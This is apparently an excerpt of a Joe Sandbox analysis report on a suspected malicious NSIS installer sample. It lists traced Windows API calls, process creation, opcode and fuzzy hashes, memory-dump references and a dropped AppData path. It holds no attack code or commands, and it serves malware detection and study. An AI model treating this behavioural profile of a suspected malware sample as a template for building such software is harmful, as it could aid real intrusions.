• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
• Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
• Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
• Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
• Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
• Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
• Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
• Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
• Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                              • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                              • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                              • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 00405B8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID:
                                                              • API String ID: 587946157-0
                                                              • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                              • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                              • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                              • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                              • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                              • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                              • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                              • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                              • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                              • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                              APIs
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                                              • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                              • Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                                              • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                              • lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
                                                              • lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                • Part of subcall function 00406805: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                              • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$Exec
                                                              • API String ID: 2624150263-2074005321
                                                              • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                              • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                              • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                              • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                              APIs
                                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                              Strings
                                                              • C:\Users\user\AppData\Local\acneform\Tjenestepligterne, xrefs: 0040226E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Local\acneform\Tjenestepligterne
                                                              • API String ID: 542301482-3042626848
                                                              • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                              • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                              • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                              • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                              • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                              • DeleteObject.GDI32(00000000), ref: 0040503D
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                              • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                              • GlobalFree.KERNEL32(?), ref: 0040537D
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                              • ShowWindow.USER32(?,00000000), ref: 00405527
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                              • ShowWindow.USER32(00000000), ref: 00405539
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                              • GetSysColor.USER32(?), ref: 00404775
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                              • lstrlenW.KERNEL32(?), ref: 00404796
